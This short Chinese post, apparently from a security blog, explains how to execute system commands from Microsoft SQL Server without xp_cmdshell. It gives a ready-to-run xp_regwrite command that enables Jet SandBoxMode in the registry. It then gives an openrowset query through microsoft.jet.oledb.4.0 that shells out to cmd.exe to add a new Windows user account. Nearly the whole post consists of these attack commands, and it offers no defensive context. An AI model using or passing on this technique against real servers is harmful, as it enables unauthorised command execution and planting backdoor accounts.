文章摘要
文章主要介绍了如何在Windows沙盘模式下执行系统命令的具体操作。通过修改注册表,将沙盘模式设置为启用沙盘,并利用`jet.oledb`驱动执行系统命令。具体操作包括使用`exec master`命令修改注册表,将沙盘模式设置为1,并通过`select * from openrowset`语句运行`cmd.exe`命令,执行`net user`命令添加用户。这种方法无需依赖`xp_cmdshell`,通过注册表和驱动实现沙盘内管理员权限的执行。
首先开启沙盘模式:
exec master..xp_regwrite ‘HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1
然后利用jet.oledb执行系统命令
select * from openrowset(‘microsoft.jet.oledb.4.0′,’;database=c:\windows\system32\ias\ias.mdb’,’select shell(“cmd.exe /c net user cnfjhh fst /add”)’)
您可能感兴趣的文章:不用xp_cmdshell照样执行命令
© 版权声明
文章版权归作者所有,未经允许请勿转载。
